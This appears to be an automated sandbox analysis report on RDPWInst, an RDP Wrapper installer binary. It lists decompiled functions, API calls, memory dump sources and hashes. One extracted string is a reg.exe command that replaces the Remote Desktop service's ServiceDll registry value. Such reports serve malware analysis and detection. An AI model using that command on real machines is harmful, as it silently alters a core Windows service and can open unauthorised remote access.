                                                                                                              control_flow_graph 1496 403028-403037 1497 403120-403123 1496->1497 1498 40303d-403041 1496->1498 1501 403210-403214 1497->1501 1502 403129-403133 1497->1502 1499 403043-40304a 1498->1499 1500 4030a4-4030ad 1498->1500 1508 403078-40307a 1499->1508 1509 40304c-403057 1499->1509 1500->1499 1507 4030af-4030b8 1500->1507 1505 402ab4-402ad9 call 402a08 1501->1505 1506 40321a-40321f 1501->1506 1503 4030e4-4030f1 1502->1503 1504 403135-403141 1502->1504 1503->1504 1517 4030f3-4030fc 1503->1517 1512 403143-403146 1504->1512 1513 403178-403186 1504->1513 1525 402af5-402afc 1505->1525 1526 402adb-402aea VirtualFree 1505->1526 1507->1500 1516 4030ba-4030ce Sleep 1507->1516 1514 40307c-40308d 1508->1514 1515 40308f 1508->1515 1510 403060-403075 1509->1510 1511 403059-40305e 1509->1511 1520 40314a-40314e 1512->1520 1513->1520 1522 403188-40318d call 402884 1513->1522 1514->1515 1521 403092-40309f 1514->1521 1515->1521 1516->1499 1523 4030d4-4030df Sleep 1516->1523 1517->1503 1524 4030fe-403112 Sleep 1517->1524 1527 403190-40319d 1520->1527 1528 403150-403156 1520->1528 1521->1502 1522->1520 1523->1500 1524->1504 1530 403114-40311b Sleep 1524->1530 1535 402afe-402b1a VirtualQuery VirtualFree 1525->1535 1531 402af0-402af3 1526->1531 1532 402aec-402aee 1526->1532 1527->1528 1537 40319f-4031a6 call 402884 1527->1537 1533 4031a8-4031b2 1528->1533 1534 403158-403176 call 4028c4 1528->1534 1530->1503 1540 402b2f-402b31 1531->1540 1532->1540 1538 4031e0-40320d call 402924 1533->1538 1539 4031b4-4031dc VirtualFree 1533->1539 1542 402b21-402b27 1535->1542 1543 402b1c-402b1f 1535->1543 1537->1528 1548 402b33-402b43 1540->1548 1549 402b46-402b56 1540->1549 1542->1540 1547 402b29-402b2d 1542->1547 1543->1540 1547->1535 1548->1549
                                                                                                              APIs
                                                                                                              • Sleep.KERNEL32(00000000,?,?,00000000,00402C9A), ref: 004030BE
                                                                                                              • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,00402C9A), ref: 004030D8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID:
                                                                                                              • API String ID: 3472027048-0
                                                                                                              • Opcode ID: 93a1e75d392f98f45c217d5d1b4a4ce21d939f5f7de44ee49ef913328a692d58
                                                                                                              • Instruction ID: 8e11df8688fcfc32dba15f0401baaa5f3e1cf13b6ab2085a37f93781684c6a2f
                                                                                                              • Opcode Fuzzy Hash: 93a1e75d392f98f45c217d5d1b4a4ce21d939f5f7de44ee49ef913328a692d58
                                                                                                              • Instruction Fuzzy Hash: 9F7115312052009FD715CF69CE89726BFE4AB89315F14827FD444AB3D6D7B889458789
                                                                                                              Function 0043C598 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 98COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(00000000,0043C716,?,?,?,00447324,00000000,00000000,00000000,?,00443BC6,00000000,00443FB2), ref: 0043C600
                                                                                                              Strings
                                                                                                              • %SystemRoot%, xrefs: 0043C682
                                                                                                              • $sD, xrefs: 0043C60D
                                                                                                              • ServiceDll, xrefs: 0043C650
                                                                                                              • [-] OpenKey error (code , xrefs: 0043C612
                                                                                                              • \system32\reg.exe" add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d ", xrefs: 0043C68F
                                                                                                              • " /f, xrefs: 0043C69A
                                                                                                              • \SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0043C5EF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast
                                                                                                              • String ID: " /f$$sD$%SystemRoot%$ServiceDll$[-] OpenKey error (code $\SYSTEM\CurrentControlSet\Services\TermService\Parameters$\system32\reg.exe" add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "
                                                                                                              • API String ID: 1452528299-2956723230
                                                                                                              • Opcode ID: 0c5b84642f90c2c43a864384322aaebdce3b992f712f0d9bf057b86ee0e3b406
                                                                                                              • Instruction ID: 86ae2d0f633f2b7d457566c29c3046f730a81976c8e7ce91198a0ccb689aa4bb
                                                                                                              • Opcode Fuzzy Hash: 0c5b84642f90c2c43a864384322aaebdce3b992f712f0d9bf057b86ee0e3b406
                                                                                                              • Instruction Fuzzy Hash: B331DE74A04204AFDB10FB66CC82A2E77A5DB4D308F61A07BF800B7291CB3CAD049B5D
                                                                                                              Function 00402CA4 Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • Sleep.KERNEL32(00000000,?,00402C72), ref: 00402D5B
                                                                                                              • Sleep.KERNEL32(0000000A,00000000,?,00402C72), ref: 00402D71
                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,00402C72), ref: 00402D9F
                                                                                                              • Sleep.KERNEL32(0000000A,00000000,?,?,?,00402C72), ref: 00402DB5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID:
                                                                                                              • API String ID: 3472027048-0
                                                                                                              • Opcode ID: 50f8b12719e1c4c784f8227bf124f2ef405a8e2e831e3cb3860c1e75e50a0c63
                                                                                                              • Instruction ID: 31c3f393645164f4675e576557a9223240219fe3669f0ad713ca74d6ded16897
                                                                                                              • Opcode Fuzzy Hash: 50f8b12719e1c4c784f8227bf124f2ef405a8e2e831e3cb3860c1e75e50a0c63
                                                                                                              • Instruction Fuzzy Hash: B4C147766052518FD715CF28DE8831ABBE0AB86314F1882BFD444BB3D5C7B89946CBD8
                                                                                                              Function 0040941C Relevance: 6.1, APIs: 4, Instructions: 118stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • lstrcpynW.KERNEL32(?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409497
                                                                                                              • lstrlenW.KERNEL32(?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 004094A3
                                                                                                              • GetUserDefaultUILanguage.KERNEL32(?,?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409530
                                                                                                              • GetSystemDefaultUILanguage.KERNEL32(?,?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 0040955C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DefaultLanguage$SystemUserlstrcpynlstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 3749826553-0
                                                                                                              • Opcode ID: d710f7c1299fe0245be1f89c25ed315f3e3ffeabd22d09ed061d9454a6b695c6
                                                                                                              • Instruction ID: 670d7e8fee0ffa615f00d819e5c077188fbd82142d60affd8ce3058b6d31cf6a
                                                                                                              • Opcode Fuzzy Hash: d710f7c1299fe0245be1f89c25ed315f3e3ffeabd22d09ed061d9454a6b695c6
                                                                                                              • Instruction Fuzzy Hash: 37416571A002195ED721EB6ADC8978EB3B4EF48304F5005BAE448B72D2DB789E908E58
                                                                                                              Function 004040B4 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 55COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00404194,0040A1B9,00000000,0040A1E0), ref: 004040D2
                                                                                                              • VirtualFree.KERNEL32(00449AC8,00000000,00008000,?,00000000,00008000,?,?,?,?,00404194,0040A1B9,00000000,0040A1E0), ref: 0040412F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeVirtual
                                                                                                              • String ID: $zD$xPD
                                                                                                              • API String ID: 1263568516-535612291
                                                                                                              • Opcode ID: ee1e8e4c5ce6b12cd624387e406e1cf1ad3c0fb6f8253ccd4ae2b310545238de
                                                                                                              • Instruction ID: 63e96df57fdc30e3e5434cdd8ac4306be2e0fcd0727744789414a485f14a8afc
                                                                                                              • Opcode Fuzzy Hash: ee1e8e4c5ce6b12cd624387e406e1cf1ad3c0fb6f8253ccd4ae2b310545238de
                                                                                                              • Instruction Fuzzy Hash: CF1161B13012009FDB248F059985B26BAE5EBC4714F55C0BEE309AF3C2D679EC01CB58
                                                                                                              Function 00438B0C Relevance: 4.6, APIs: 3, Instructions: 150registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438B85
                                                                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438BFB
                                                                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00438C6C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Open
                                                                                                              • String ID:
                                                                                                              • API String ID: 71445658-0
                                                                                                              • Opcode ID: 56a7ec8d88e5670b99992fed871dbba86343d1eb3cba1c9f5227469b2a4bb512
                                                                                                              • Instruction ID: 3681a8d3f24b20706dc106850b3bb9ce640454c4e8124a7cc358b0d46e7adf70
                                                                                                              • Opcode Fuzzy Hash: 56a7ec8d88e5670b99992fed871dbba86343d1eb3cba1c9f5227469b2a4bb512
                                                                                                              • Instruction Fuzzy Hash: 1F51A370B00344AFDB11EBA5C842B9EF7F9AB48304F11547EB444A3282CA7DAF069759
                                                                                                              Function 00406220 Relevance: 4.6, APIs: 3, Instructions: 79threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                                                                              • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                                                                              • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                                                                                • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                                                • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                                                • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                                                • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 3490077880-0
                                                                                                              • Opcode ID: 366fdbe2bdf6eda399ec161f43325e884a453738e97a5e27564f450e25dd0238
                                                                                                              • Instruction ID: 823ae625d887489e04d5fb836baef855571e76b59bd7737af2fa314308855dda
                                                                                                              • Opcode Fuzzy Hash: 366fdbe2bdf6eda399ec161f43325e884a453738e97a5e27564f450e25dd0238
                                                                                                              • Instruction Fuzzy Hash: 0D316F749002508BEF21BF69988975737A0AB05319F1640BFE806AB2D7C77C9CA4CB9D
                                                                                                              Function 00406218 Relevance: 4.6, APIs: 3, Instructions: 76threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                                                                              • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                                                                              • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                                                                                • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                                                • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                                                • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                                                • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 3490077880-0
                                                                                                              • Opcode ID: 4e2b89c40ccb1b4c43cad0f32e0a83214a0d4d0925328316d29d930894bce137
                                                                                                              • Instruction ID: 46b61aa2349ed196f7bea0abd1f985a96ea7bcfce35a4251490327c9ac1ca2fd
                                                                                                              • Opcode Fuzzy Hash: 4e2b89c40ccb1b4c43cad0f32e0a83214a0d4d0925328316d29d930894bce137
                                                                                                              • Instruction Fuzzy Hash: 1331A2749002908BDF21BF78888975737A0AB06319F1640BFE845AB2D7C37C9CA4CB9D
                                                                                                              Function 0040621C Relevance: 4.6, APIs: 3, Instructions: 74threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                                                                              • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                                                                              • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                                                                                • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                                                • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                                                • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                                                • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 3490077880-0
                                                                                                              • Opcode ID: 6b58315340373024079e24359f3f29825cf54609d1d79e5c4cc5367edd112065
                                                                                                              • Instruction ID: d971c45546d1ba4d910c131f5b4d15d6df32f901540fb653785064192c66a389
                                                                                                              • Opcode Fuzzy Hash: 6b58315340373024079e24359f3f29825cf54609d1d79e5c4cc5367edd112065
                                                                                                              • Instruction Fuzzy Hash: 712191749002508BDF21BF79988975737A0AB06319F1640BFE806AB2C7C37C9CA4CB9D
                                                                                                              Function 00402990 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 38memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,00402F9F,?,00402C72), ref: 004029A6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID: $zD$$zD
                                                                                                              • API String ID: 4275171209-354537599
                                                                                                              • Opcode ID: 1540fdcf1954a72339a161570870ab93fcd0dcb29e693a4e8299ffb28a0cb967
                                                                                                              • Instruction ID: 5217acd6ab2d11c2bd36ab0357f96252e91eb64f60a530f80fec48377855cdbd
                                                                                                              • Opcode Fuzzy Hash: 1540fdcf1954a72339a161570870ab93fcd0dcb29e693a4e8299ffb28a0cb967
                                                                                                              • Instruction Fuzzy Hash: 8AF062F1B143004FDB45CF799D853157AD1A78A318F20807EE608EB7E8EBB484468B48
                                                                                                              Function 004069D4 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 004068D2
                                                                                                              • SysAllocStringLen.OLEAUT32(?,?), ref: 004069DF
                                                                                                              • SysFreeString.OLEAUT32(?), ref: 004069F1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
